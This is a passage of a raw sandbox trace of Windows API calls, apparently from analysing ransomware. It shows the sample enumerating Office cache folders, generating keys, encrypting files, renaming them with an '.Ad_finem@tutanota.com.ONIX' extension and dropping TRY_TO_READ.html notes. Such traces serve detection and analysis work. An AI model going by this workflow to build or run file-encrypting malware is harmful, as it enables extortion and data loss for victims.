lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.680] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.680] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.680] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.680] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0104.681] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0104.681] GetProcessHeap () returned 0x410000 [0104.681] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0104.681] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" [0104.681] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.681] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=9352) returned 1 [0104.681] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2488 [0104.681] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.681] GetProcessHeap () returned 0x410000 [0104.681] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.681] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.683] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.684] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.685] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2488) returned 0x4d8b68 [0104.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2488) returned 0x4daff8 [0104.686] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.686] ReadFile (in: hFile=0x488, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x2488, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x2488, lpOverlapped=0x0) returned 1 [0104.689] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2488, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.689] CloseHandle (hObject=0x488) returned 1 [0104.689] GetProcessHeap () returned 0x410000 [0104.689] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.689] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.691] GetProcessHeap () returned 0x410000 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.691] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.691] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.691] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.691] GetLastError () returned 0x0 [0104.691] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.691] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.691] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe00, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.692] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.692] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.693] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.693] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.693] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.693] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.693] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", dwFileAttributes=0x80) returned 1 [0104.693] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 75 [0104.693] GetProcessHeap () returned 0x410000 [0104.693] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0104.693] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" [0104.693] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.693] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3584) returned 1 [0104.694] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xe00 [0104.694] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.694] GetProcessHeap () returned 0x410000 [0104.694] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.694] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.694] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.695] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.696] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe00) returned 0x4d8b68 [0104.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe00) returned 0x4d9970 [0104.698] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.698] ReadFile (in: hFile=0x488, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xe00, lpOverlapped=0x0) returned 1 [0104.698] SetFilePointer (in: hFile=0x488, lDistanceToMove=-3584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.698] WriteFile (in: hFile=0x488, lpBuffer=0x4d9970*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9970*, lpNumberOfBytesWritten=0x367f44c*=0xe00, lpOverlapped=0x0) returned 1 [0104.699] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.699] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9970 | out: hHeap=0x410000) returned 1 [0104.699] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.699] CloseHandle (hObject=0x488) returned 1 [0104.700] GetProcessHeap () returned 0x410000 [0104.700] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.700] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.701] GetProcessHeap () returned 0x410000 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.702] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.702] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.702] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.702] GetLastError () returned 0x0 [0104.702] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0104.702] CloseHandle (hObject=0x3cc) returned 1 [0104.702] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.702] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x2c, wMilliseconds=0x51)) [0104.702] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0104.702] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0104.703] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0104.703] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0104.703] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0104.703] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.703] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0104.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0104.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458968 | out: hHeap=0x410000) returned 1 [0104.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f6d0 | out: hHeap=0x410000) returned 1 [0104.703] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ec30 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.704] GetLastError () returned 0x0 [0104.704] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.704] GetLastError () returned 0x0 [0104.704] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.704] GetLastError () returned 0x0 [0104.704] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0104.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4731e0 | out: hHeap=0x410000) returned 1 [0104.707] WriteFile (in: hFile=0x48c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0104.707] WriteFile (in: hFile=0x48c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0104.708] WriteFile (in: hFile=0x48c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0104.708] CloseHandle (hObject=0x48c) returned 1 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0104.708] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.708] GetLastError () returned 0x0 [0104.708] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x48c [0104.708] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.709] LockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd4200, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.709] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.709] ReadFile (in: hFile=0x48c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.710] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.710] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.710] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.710] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.710] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", dwFileAttributes=0x80) returned 1 [0104.711] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 80 [0104.711] GetProcessHeap () returned 0x410000 [0104.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0104.711] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" [0104.711] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All 